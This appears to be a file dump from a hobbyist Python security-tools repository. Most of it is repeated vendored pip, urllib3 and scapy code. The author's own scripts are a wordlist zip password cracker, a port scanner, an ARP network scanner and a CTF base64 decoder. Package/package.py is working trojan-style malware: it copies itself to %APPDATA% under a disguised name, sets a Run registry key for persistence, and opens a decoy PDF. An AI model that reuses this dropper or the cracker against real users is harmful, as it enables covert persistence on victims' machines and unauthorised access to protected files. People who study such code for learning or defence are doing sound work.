/tcp_socket_client/venv/lib/python3.7/site-packages/requests-2.22.0.dist-info/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2018 Kenneth Reitz 2 | 3 | Licensed under the Apache License, Version 2.0 (the "License"); 4 | you may not use this file except in compliance with the License. 5 | You may obtain a copy of the License at 6 | 7 | https://www.apache.org/licenses/LICENSE-2.0 8 | 9 | Unless required by applicable law or agreed to in writing, software 10 | distributed under the License is distributed on an "AS IS" BASIS, 11 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | See the License for the specific language governing permissions and 13 | limitations under the License. 14 | -------------------------------------------------------------------------------- /Zip-Password-Cracker/zip_crack.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python3 2 | from tqdm import tqdm 3 | import zipfile 4 | import sys 5 | 6 | wordlist = sys.argv[2] 7 | zip_file = sys.argv[1] 8 | 9 | zip_file = zipfile.ZipFile(zip_file) 10 | n_words = len(list(open(wordlist, "rb"))) 11 | 12 | print("Total passwords to test:", n_words) 13 | with open(wordlist, "rb") as wordlist: 14 | for word in tqdm(wordlist, total=n_words, unit="word"): 15 | try: 16 | zip_file.extractall(pwd=word.strip()) 17 | except: 18 | continue 19 | else: 20 | print("[+] Password found:", word.decode().strip()) 21 | exit(0) 22 | print("[!] Password not found, try other wordlist.") 23 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/arch/bpf/consts.py: -------------------------------------------------------------------------------- 1 | # Guillaume Valadon 2 | 3 | """ 4 | Scapy *BSD native support - constants 5 | """ 6 | 7 | from ctypes import sizeof 8 | 9 | from scapy.arch.common import bpf_program 10 | from scapy.data import MTU 11 | 12 | 13 | SIOCGIFFLAGS = 0xc0206911 14 | BPF_BUFFER_LENGTH = MTU 15 | 16 | # From net/bpf.h 17 | BIOCIMMEDIATE = 0x80044270 18 | BIOCGSTATS = 0x4008426f 19 | BIOCPROMISC = 0x20004269 20 | BIOCSETIF = 0x8020426c 21 | BIOCSBLEN = 0xc0044266 22 | BIOCGBLEN = 0x40044266 23 | BIOCSETF = 0x80004267 | ((sizeof(bpf_program) & 0x1fff) << 16) 24 | BIOCSDLT = 0x80044278 25 | BIOCSHDRCMPLT = 0x80044275 26 | BIOCGDLT = 0x4004426a 27 | DLT_IEEE802_11_RADIO = 127 28 | -------------------------------------------------------------------------------- /base64-multiple-decoder/README.md: -------------------------------------------------------------------------------- 1 | + A simple tool for automating the decoding of multiple times base64 encoded flags. Great for CTFs. 2 | + In this example, 13 times decode. But you can specify for your requirements: `python decode.py` 3 | 4 | ![image](https://github.com/h4md153v63n/Python_Security_Codes/assets/5091265/100152f6-9dca-41a8-b2a3-134a6e73bfbc) 5 | 6 | + **Also** try other script: `python3 decode2.py` 7 | 8 | ![image](https://github.com/h4md153v63n/Python_Security_Codes/assets/5091265/b6d942e1-6c92-428a-8510-de5679e48d48) 9 | 10 | + **Alternatively**, try this online tool: https://base64-multiple-decode.netlify.app 11 | 12 | ![image](https://github.com/h4md153v63n/Bash_Scripts/assets/5091265/27a222f4-dc74-4795-ada0-86bda6fae3b6) 13 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pkg_resources/py31compat.py: -------------------------------------------------------------------------------- 1 | import os 2 | import errno 3 | import sys 4 | 5 | from pip._vendor import six 6 | 7 | 8 | def _makedirs_31(path, exist_ok=False): 9 | try: 10 | os.makedirs(path) 11 | except OSError as exc: 12 | if not exist_ok or exc.errno != errno.EEXIST: 13 | raise 14 | 15 | 16 | # rely on compatibility behavior until mode considerations 17 | # and exists_ok considerations are disentangled. 18 | # See https://github.com/pypa/setuptools/pull/1083#issuecomment-315168663 19 | needs_makedirs = ( 20 | six.PY2 or 21 | (3, 4) <= sys.version_info < (3, 4, 1) 22 | ) 23 | makedirs = _makedirs_31 if needs_makedirs else os.makedirs 24 | -------------------------------------------------------------------------------- /PortScanner_2/portenum.py: -------------------------------------------------------------------------------- 1 | import sys,socket 2 | ip = f"{sys.argv[1]}" 3 | open_ports =[] 4 | ports = range(1, 65535) 5 | def probe_port(ip, port, result = 1): 6 | try: 7 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | sock.settimeout(0.5) 9 | r = sock.connect_ex((ip, port)) 10 | if r == 0: 11 | result = r 12 | sock.close() 13 | except Exception as e: 14 | pass 15 | return result 16 | for port in ports: 17 | sys.stdout.flush() 18 | response = probe_port(ip, port) 19 | if response == 0: 20 | open_ports.append(port) 21 | 22 | if open_ports: 23 | print ("Open Ports are: ") 24 | print (sorted(open_ports)) 25 | else: 26 | print ("Looks like no ports are open :(") 27 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pkg_resources/py31compat.py: -------------------------------------------------------------------------------- 1 | import os 2 | import errno 3 | import sys 4 | 5 | from pip._vendor import six 6 | 7 | 8 | def _makedirs_31(path, exist_ok=False): 9 | try: 10 | os.makedirs(path) 11 | except OSError as exc: 12 | if not exist_ok or exc.errno != errno.EEXIST: 13 | raise 14 | 15 | 16 | # rely on compatibility behavior until mode considerations 17 | # and exists_ok considerations are disentangled. 18 | # See https://github.com/pypa/setuptools/pull/1083#issuecomment-315168663 19 | needs_makedirs = ( 20 | six.PY2 or 21 | (3, 4) <= sys.version_info < (3, 4, 1) 22 | ) 23 | makedirs = _makedirs_31 if needs_makedirs else os.makedirs 24 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 3 | # Copyright (C) 2012-2017 Vinay Sajip. 4 | # Licensed to the Python Software Foundation under a contributor agreement. 5 | # See LICENSE.txt and CONTRIBUTORS.txt. 6 | # 7 | import logging 8 | 9 | __version__ = '0.2.8' 10 | 11 | class DistlibException(Exception): 12 | pass 13 | 14 | try: 15 | from logging import NullHandler 16 | except ImportError: # pragma: no cover 17 | class NullHandler(logging.Handler): 18 | def handle(self, record): pass 19 | def emit(self, record): pass 20 | def createLock(self): self.lock = None 21 | 22 | logger = logging.getLogger(__name__) 23 | logger.addHandler(NullHandler()) 24 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/packaging/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is dual licensed under the terms of the Apache License, Version 2 | # 2.0, and the BSD License. See the LICENSE file in the root of this repository 3 | # for complete details. 4 | from __future__ import absolute_import, division, print_function 5 | 6 | from .__about__ import ( 7 | __author__, 8 | __copyright__, 9 | __email__, 10 | __license__, 11 | __summary__, 12 | __title__, 13 | __uri__, 14 | __version__, 15 | ) 16 | 17 | __all__ = [ 18 | "__title__", 19 | "__summary__", 20 | "__uri__", 21 | "__version__", 22 | "__author__", 23 | "__email__", 24 | "__license__", 25 | "__copyright__", 26 | ] 27 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/layers/tls/crypto/ciphers.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard 3 | # 2015, 2016 Maxence Tury 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | TLS ciphers. 8 | """ 9 | 10 | # in order to avoid circular dependencies. 11 | from scapy.layers.tls.crypto.cipher_aead import _tls_aead_cipher_algs 12 | from scapy.layers.tls.crypto.cipher_block import _tls_block_cipher_algs 13 | from scapy.layers.tls.crypto.cipher_stream import _tls_stream_cipher_algs 14 | 15 | _tls_cipher_algs = {} 16 | _tls_cipher_algs.update(_tls_block_cipher_algs) 17 | _tls_cipher_algs.update(_tls_stream_cipher_algs) 18 | _tls_cipher_algs.update(_tls_aead_cipher_algs) 19 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pkg_resources/py31compat.py: -------------------------------------------------------------------------------- 1 | import os 2 | import errno 3 | import sys 4 | 5 | from pip._vendor import six 6 | 7 | 8 | def _makedirs_31(path, exist_ok=False): 9 | try: 10 | os.makedirs(path) 11 | except OSError as exc: 12 | if not exist_ok or exc.errno != errno.EEXIST: 13 | raise 14 | 15 | 16 | # rely on compatibility behavior until mode considerations 17 | # and exists_ok considerations are disentangled. 18 | # See https://github.com/pypa/setuptools/pull/1083#issuecomment-315168663 19 | needs_makedirs = ( 20 | six.PY2 or 21 | (3, 4) <= sys.version_info < (3, 4, 1) 22 | ) 23 | makedirs = _makedirs_31 if needs_makedirs else os.makedirs 24 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 3 | # Copyright (C) 2012-2017 Vinay Sajip. 4 | # Licensed to the Python Software Foundation under a contributor agreement. 5 | # See LICENSE.txt and CONTRIBUTORS.txt. 6 | # 7 | import logging 8 | 9 | __version__ = '0.2.8' 10 | 11 | class DistlibException(Exception): 12 | pass 13 | 14 | try: 15 | from logging import NullHandler 16 | except ImportError: # pragma: no cover 17 | class NullHandler(logging.Handler): 18 | def handle(self, record): pass 19 | def emit(self, record): pass 20 | def createLock(self): self.lock = None 21 | 22 | logger = logging.getLogger(__name__) 23 | logger.addHandler(NullHandler()) 24 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/packaging/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is dual licensed under the terms of the Apache License, Version 2 | # 2.0, and the BSD License. See the LICENSE file in the root of this repository 3 | # for complete details. 4 | from __future__ import absolute_import, division, print_function 5 | 6 | from .__about__ import ( 7 | __author__, 8 | __copyright__, 9 | __email__, 10 | __license__, 11 | __summary__, 12 | __title__, 13 | __uri__, 14 | __version__, 15 | ) 16 | 17 | __all__ = [ 18 | "__title__", 19 | "__summary__", 20 | "__uri__", 21 | "__version__", 22 | "__author__", 23 | "__email__", 24 | "__license__", 25 | "__copyright__", 26 | ] 27 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/packaging/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is dual licensed under the terms of the Apache License, Version 2 | # 2.0, and the BSD License. See the LICENSE file in the root of this repository 3 | # for complete details. 4 | from __future__ import absolute_import, division, print_function 5 | 6 | from .__about__ import ( 7 | __author__, 8 | __copyright__, 9 | __email__, 10 | __license__, 11 | __summary__, 12 | __title__, 13 | __uri__, 14 | __version__, 15 | ) 16 | 17 | __all__ = [ 18 | "__title__", 19 | "__summary__", 20 | "__uri__", 21 | "__version__", 22 | "__author__", 23 | "__email__", 24 | "__license__", 25 | "__copyright__", 26 | ] 27 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/__main__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | import os 4 | import sys 5 | 6 | # If we are running from a wheel, add the wheel to sys.path 7 | # This allows the usage python pip-*.whl/pip install pip-*.whl 8 | if __package__ == '': 9 | # __file__ is pip-*.whl/pip/__main__.py 10 | # first dirname call strips of '/__main__.py', second strips off '/pip' 11 | # Resulting path is the name of the wheel itself 12 | # Add that to sys.path so we can import pip 13 | path = os.path.dirname(os.path.dirname(__file__)) 14 | sys.path.insert(0, path) 15 | 16 | from pip._internal import main as _main # isort:skip # noqa 17 | 18 | if __name__ == '__main__': 19 | sys.exit(_main()) 20 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/__main__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | import os 4 | import sys 5 | 6 | # If we are running from a wheel, add the wheel to sys.path 7 | # This allows the usage python pip-*.whl/pip install pip-*.whl 8 | if __package__ == '': 9 | # __file__ is pip-*.whl/pip/__main__.py 10 | # first dirname call strips of '/__main__.py', second strips off '/pip' 11 | # Resulting path is the name of the wheel itself 12 | # Add that to sys.path so we can import pip 13 | path = os.path.dirname(os.path.dirname(__file__)) 14 | sys.path.insert(0, path) 15 | 16 | from pip._internal import main as _main # isort:skip # noqa 17 | 18 | if __name__ == '__main__': 19 | sys.exit(_main()) 20 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 3 | # Copyright (C) 2012-2017 Vinay Sajip. 4 | # Licensed to the Python Software Foundation under a contributor agreement. 5 | # See LICENSE.txt and CONTRIBUTORS.txt. 6 | # 7 | import logging 8 | 9 | __version__ = '0.2.8' 10 | 11 | class DistlibException(Exception): 12 | pass 13 | 14 | try: 15 | from logging import NullHandler 16 | except ImportError: # pragma: no cover 17 | class NullHandler(logging.Handler): 18 | def handle(self, record): pass 19 | def emit(self, record): pass 20 | def createLock(self): self.lock = None 21 | 22 | logger = logging.getLogger(__name__) 23 | logger.addHandler(NullHandler()) 24 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/__main__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | import os 4 | import sys 5 | 6 | # If we are running from a wheel, add the wheel to sys.path 7 | # This allows the usage python pip-*.whl/pip install pip-*.whl 8 | if __package__ == '': 9 | # __file__ is pip-*.whl/pip/__main__.py 10 | # first dirname call strips of '/__main__.py', second strips off '/pip' 11 | # Resulting path is the name of the wheel itself 12 | # Add that to sys.path so we can import pip 13 | path = os.path.dirname(os.path.dirname(__file__)) 14 | sys.path.insert(0, path) 15 | 16 | from pip._internal import main as _main # isort:skip # noqa 17 | 18 | if __name__ == '__main__': 19 | sys.exit(_main()) 20 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pep517/compat.py: -------------------------------------------------------------------------------- 1 | """Handle reading and writing JSON in UTF-8, on Python 3 and 2.""" 2 | import json 3 | import sys 4 | 5 | if sys.version_info[0] >= 3: 6 | # Python 3 7 | def write_json(obj, path, **kwargs): 8 | with open(path, 'w', encoding='utf-8') as f: 9 | json.dump(obj, f, **kwargs) 10 | 11 | def read_json(path): 12 | with open(path, 'r', encoding='utf-8') as f: 13 | return json.load(f) 14 | 15 | else: 16 | # Python 2 17 | def write_json(obj, path, **kwargs): 18 | with open(path, 'wb') as f: 19 | json.dump(obj, f, encoding='utf-8', **kwargs) 20 | 21 | def read_json(path): 22 | with open(path, 'rb') as f: 23 | return json.load(f) 24 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pep517/compat.py: -------------------------------------------------------------------------------- 1 | """Handle reading and writing JSON in UTF-8, on Python 3 and 2.""" 2 | import json 3 | import sys 4 | 5 | if sys.version_info[0] >= 3: 6 | # Python 3 7 | def write_json(obj, path, **kwargs): 8 | with open(path, 'w', encoding='utf-8') as f: 9 | json.dump(obj, f, **kwargs) 10 | 11 | def read_json(path): 12 | with open(path, 'r', encoding='utf-8') as f: 13 | return json.load(f) 14 | 15 | else: 16 | # Python 2 17 | def write_json(obj, path, **kwargs): 18 | with open(path, 'wb') as f: 19 | json.dump(obj, f, encoding='utf-8', **kwargs) 20 | 21 | def read_json(path): 22 | with open(path, 'rb') as f: 23 | return json.load(f) 24 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pep517/compat.py: -------------------------------------------------------------------------------- 1 | """Handle reading and writing JSON in UTF-8, on Python 3 and 2.""" 2 | import json 3 | import sys 4 | 5 | if sys.version_info[0] >= 3: 6 | # Python 3 7 | def write_json(obj, path, **kwargs): 8 | with open(path, 'w', encoding='utf-8') as f: 9 | json.dump(obj, f, **kwargs) 10 | 11 | def read_json(path): 12 | with open(path, 'r', encoding='utf-8') as f: 13 | return json.load(f) 14 | 15 | else: 16 | # Python 2 17 | def write_json(obj, path, **kwargs): 18 | with open(path, 'wb') as f: 19 | json.dump(obj, f, encoding='utf-8', **kwargs) 20 | 21 | def read_json(path): 22 | with open(path, 'rb') as f: 23 | return json.load(f) 24 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/packages.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | # This code exists for backwards compatibility reasons. 4 | # I don't like it either. Just look the other way. :) 5 | 6 | for package in ('urllib3', 'idna', 'chardet'): 7 | vendored_package = "pip._vendor." + package 8 | locals()[package] = __import__(vendored_package) 9 | # This traversal is apparently necessary such that the identities are 10 | # preserved (requests.packages.urllib3.* is urllib3.*) 11 | for mod in list(sys.modules): 12 | if mod == vendored_package or mod.startswith(vendored_package + '.'): 13 | unprefixed_mod = mod[len("pip._vendor."):] 14 | sys.modules['pip._vendor.requests.packages.' + unprefixed_mod] = sys.modules[mod] 15 | 16 | # Kinda cool, though, right? 17 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/packages.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | # This code exists for backwards compatibility reasons. 4 | # I don't like it either. Just look the other way. :) 5 | 6 | for package in ('urllib3', 'idna', 'chardet'): 7 | vendored_package = "pip._vendor." + package 8 | locals()[package] = __import__(vendored_package) 9 | # This traversal is apparently necessary such that the identities are 10 | # preserved (requests.packages.urllib3.* is urllib3.*) 11 | for mod in list(sys.modules): 12 | if mod == vendored_package or mod.startswith(vendored_package + '.'): 13 | unprefixed_mod = mod[len("pip._vendor."):] 14 | sys.modules['pip._vendor.requests.packages.' + unprefixed_mod] = sys.modules[mod] 15 | 16 | # Kinda cool, though, right? 17 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/packages.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | # This code exists for backwards compatibility reasons. 4 | # I don't like it either. Just look the other way. :) 5 | 6 | for package in ('urllib3', 'idna', 'chardet'): 7 | vendored_package = "pip._vendor." + package 8 | locals()[package] = __import__(vendored_package) 9 | # This traversal is apparently necessary such that the identities are 10 | # preserved (requests.packages.urllib3.* is urllib3.*) 11 | for mod in list(sys.modules): 12 | if mod == vendored_package or mod.startswith(vendored_package + '.'): 13 | unprefixed_mod = mod[len("pip._vendor."):] 14 | sys.modules['pip._vendor.requests.packages.' + unprefixed_mod] = sys.modules[mod] 15 | 16 | # Kinda cool, though, right? 17 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/packages/ssl_match_hostname/__init__.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | try: 4 | # Our match_hostname function is the same as 3.5's, so we only want to 5 | # import the match_hostname function if it's at least that good. 6 | if sys.version_info < (3, 5): 7 | raise ImportError("Fallback to vendored code") 8 | 9 | from ssl import CertificateError, match_hostname 10 | except ImportError: 11 | try: 12 | # Backport of the function from a pypi module 13 | from backports.ssl_match_hostname import CertificateError, match_hostname 14 | except ImportError: 15 | # Our vendored copy 16 | from ._implementation import CertificateError, match_hostname 17 | 18 | # Not needed, but documenting what we provide. 19 | __all__ = ("CertificateError", "match_hostname") 20 | -------------------------------------------------------------------------------- /Package/package.py: -------------------------------------------------------------------------------- 1 | import time 2 | import subprocess 3 | import os 4 | import shutil 5 | import sys 6 | 7 | def add_to_registry(): 8 | 9 | file_path = os.environ["appdata"] + "\\sysupgrades.exe" 10 | if not os.path.exists(file_path): 11 | shutil.copyfile(sys.executable, file_path) 12 | regedit_command = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upgrade /t REG_SZ /d " + file_path 13 | subprocess.call(regedit_command, shell=True) 14 | 15 | add_to_registry() 16 | 17 | def open_file(): 18 | file = sys._MEIPASS + "\\Ceh.pdf" 19 | subprocess.Popen(file, shell=True) 20 | 21 | open_file() 22 | 23 | x = 0 24 | while x<100: 25 | print("I hacked you!") 26 | x+=1 27 | time.sleep(0.5) 28 | 29 | # check = subprocess.check_output("command", shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL) 30 | -------------------------------------------------------------------------------- /NetworkScanner/NetworkScanner.py: -------------------------------------------------------------------------------- 1 | import scapy.all as scapy 2 | import optparse 3 | 4 | 5 | def get_input(): 6 | parse_object = optparse.OptionParser() 7 | parse_object.add_option("-i", "--ip_address", dest="ip_address", help="Enter IP address") 8 | 9 | (user_input, arguments) = parse_object.parse_args() 10 | 11 | if not user_input.ip_address: 12 | print("Enter IP address") 13 | 14 | return user_input 15 | 16 | 17 | def scan_network(ip): 18 | arp_request = scapy.ARP(pdst=ip) 19 | # scapy.ls(scapy.ARP()) 20 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 21 | # scapy.ls(scapy.Ether()) 22 | all_packet = broadcast / arp_request 23 | (answered_list, unanswered_list) = scapy.srp(all_packet, timeout=1) 24 | answered_list.summmary() 25 | 26 | 27 | ip_address = get_input() 28 | scan_network(ip_address.ip_address) 29 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/scada/iec104/__init__.py: -------------------------------------------------------------------------------- 1 | """contains the IEC 60870-5-104 package.""" 2 | 3 | from scapy.contrib.scada.iec104.iec104_fields import * # noqa F403,F401 4 | from scapy.contrib.scada.iec104.iec104_information_elements import * # noqa F403,F401 5 | from scapy.contrib.scada.iec104.iec104_information_objects import * # noqa F403,F401 6 | from scapy.contrib.scada.iec104.iec104 import * # noqa F403,F401 7 | 8 | # This file is part of Scapy 9 | # See http://www.secdev.org/projects/scapy for more information 10 | # Copyright (C) Thomas Tannhaeuser 11 | # This program is published under a GPLv2 license 12 | # 13 | # scapy.contrib.description = IEC-60870-5-104 APCI / APDU layer definitions 14 | # scapy.contrib.status = loads 15 | 16 | 17 | # Package of contrib SCADA IEC-60870-5-104 specific modules 18 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/packages/ssl_match_hostname/__init__.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | try: 4 | # Our match_hostname function is the same as 3.5's, so we only want to 5 | # import the match_hostname function if it's at least that good. 6 | if sys.version_info < (3, 5): 7 | raise ImportError("Fallback to vendored code") 8 | 9 | from ssl import CertificateError, match_hostname 10 | except ImportError: 11 | try: 12 | # Backport of the function from a pypi module 13 | from backports.ssl_match_hostname import CertificateError, match_hostname 14 | except ImportError: 15 | # Our vendored copy 16 | from ._implementation import CertificateError, match_hostname 17 | 18 | # Not needed, but documenting what we provide. 19 | __all__ = ('CertificateError', 'match_hostname') 20 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/packages/ssl_match_hostname/__init__.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | try: 4 | # Our match_hostname function is the same as 3.5's, so we only want to 5 | # import the match_hostname function if it's at least that good. 6 | if sys.version_info < (3, 5): 7 | raise ImportError("Fallback to vendored code") 8 | 9 | from ssl import CertificateError, match_hostname 10 | except ImportError: 11 | try: 12 | # Backport of the function from a pypi module 13 | from backports.ssl_match_hostname import CertificateError, match_hostname 14 | except ImportError: 15 | # Our vendored copy 16 | from ._implementation import CertificateError, match_hostname 17 | 18 | # Not needed, but documenting what we provide. 19 | __all__ = ('CertificateError', 'match_hostname') 20 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/wrapper.py: -------------------------------------------------------------------------------- 1 | from .adapter import CacheControlAdapter 2 | from .cache import DictCache 3 | 4 | 5 | def CacheControl( 6 | sess, 7 | cache=None, 8 | cache_etags=True, 9 | serializer=None, 10 | heuristic=None, 11 | controller_class=None, 12 | adapter_class=None, 13 | cacheable_methods=None, 14 | ): 15 | 16 | cache = cache or DictCache() 17 | adapter_class = adapter_class or CacheControlAdapter 18 | adapter = adapter_class( 19 | cache, 20 | cache_etags=cache_etags, 21 | serializer=serializer, 22 | heuristic=heuristic, 23 | controller_class=controller_class, 24 | cacheable_methods=cacheable_methods, 25 | ) 26 | sess.mount("http://", adapter) 27 | sess.mount("https://", adapter) 28 | 29 | return sess 30 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/packages/ssl_match_hostname/__init__.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | try: 4 | # Our match_hostname function is the same as 3.5's, so we only want to 5 | # import the match_hostname function if it's at least that good. 6 | if sys.version_info < (3, 5): 7 | raise ImportError("Fallback to vendored code") 8 | 9 | from ssl import CertificateError, match_hostname 10 | except ImportError: 11 | try: 12 | # Backport of the function from a pypi module 13 | from backports.ssl_match_hostname import CertificateError, match_hostname 14 | except ImportError: 15 | # Our vendored copy 16 | from ._implementation import CertificateError, match_hostname 17 | 18 | # Not needed, but documenting what we provide. 19 | __all__ = ('CertificateError', 'match_hostname') 20 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/wrapper.py: -------------------------------------------------------------------------------- 1 | from .adapter import CacheControlAdapter 2 | from .cache import DictCache 3 | 4 | 5 | def CacheControl( 6 | sess, 7 | cache=None, 8 | cache_etags=True, 9 | serializer=None, 10 | heuristic=None, 11 | controller_class=None, 12 | adapter_class=None, 13 | cacheable_methods=None, 14 | ): 15 | 16 | cache = cache or DictCache() 17 | adapter_class = adapter_class or CacheControlAdapter 18 | adapter = adapter_class( 19 | cache, 20 | cache_etags=cache_etags, 21 | serializer=serializer, 22 | heuristic=heuristic, 23 | controller_class=controller_class, 24 | cacheable_methods=cacheable_methods, 25 | ) 26 | sess.mount("http://", adapter) 27 | sess.mount("https://", adapter) 28 | 29 | return sess 30 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/wrapper.py: -------------------------------------------------------------------------------- 1 | from .adapter import CacheControlAdapter 2 | from .cache import DictCache 3 | 4 | 5 | def CacheControl( 6 | sess, 7 | cache=None, 8 | cache_etags=True, 9 | serializer=None, 10 | heuristic=None, 11 | controller_class=None, 12 | adapter_class=None, 13 | cacheable_methods=None, 14 | ): 15 | 16 | cache = cache or DictCache() 17 | adapter_class = adapter_class or CacheControlAdapter 18 | adapter = adapter_class( 19 | cache, 20 | cache_etags=cache_etags, 21 | serializer=serializer, 22 | heuristic=heuristic, 23 | controller_class=controller_class, 24 | cacheable_methods=cacheable_methods, 25 | ) 26 | sess.mount("http://", adapter) 27 | sess.mount("https://", adapter) 28 | 29 | return sess 30 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/compat.py: -------------------------------------------------------------------------------- 1 | try: 2 | from urllib.parse import urljoin 3 | except ImportError: 4 | from urlparse import urljoin 5 | 6 | 7 | try: 8 | import cPickle as pickle 9 | except ImportError: 10 | import pickle 11 | 12 | 13 | # Handle the case where the requests module has been patched to not have 14 | # urllib3 bundled as part of its source. 15 | try: 16 | from pip._vendor.requests.packages.urllib3.response import HTTPResponse 17 | except ImportError: 18 | from pip._vendor.urllib3.response import HTTPResponse 19 | 20 | try: 21 | from pip._vendor.requests.packages.urllib3.util import is_fp_closed 22 | except ImportError: 23 | from pip._vendor.urllib3.util import is_fp_closed 24 | 25 | # Replicate some six behaviour 26 | try: 27 | text_type = unicode 28 | except NameError: 29 | text_type = str 30 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/treeadapters/__init__.py: -------------------------------------------------------------------------------- 1 | """Tree adapters let you convert from one tree structure to another 2 | 3 | Example: 4 | 5 | .. code-block:: python 6 | 7 | from pip._vendor import html5lib 8 | from pip._vendor.html5lib.treeadapters import genshi 9 | 10 | doc = 'Hi!' 11 | treebuilder = html5lib.getTreeBuilder('etree') 12 | parser = html5lib.HTMLParser(tree=treebuilder) 13 | tree = parser.parse(doc) 14 | TreeWalker = html5lib.getTreeWalker('etree') 15 | 16 | genshi_tree = genshi.to_genshi(TreeWalker(tree)) 17 | 18 | """ 19 | from __future__ import absolute_import, division, unicode_literals 20 | 21 | from . import sax 22 | 23 | __all__ = ["sax"] 24 | 25 | try: 26 | from . import genshi # noqa 27 | except ImportError: 28 | pass 29 | else: 30 | __all__.append("genshi") 31 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/compat.py: -------------------------------------------------------------------------------- 1 | try: 2 | from urllib.parse import urljoin 3 | except ImportError: 4 | from urlparse import urljoin 5 | 6 | 7 | try: 8 | import cPickle as pickle 9 | except ImportError: 10 | import pickle 11 | 12 | 13 | # Handle the case where the requests module has been patched to not have 14 | # urllib3 bundled as part of its source. 15 | try: 16 | from pip._vendor.requests.packages.urllib3.response import HTTPResponse 17 | except ImportError: 18 | from pip._vendor.urllib3.response import HTTPResponse 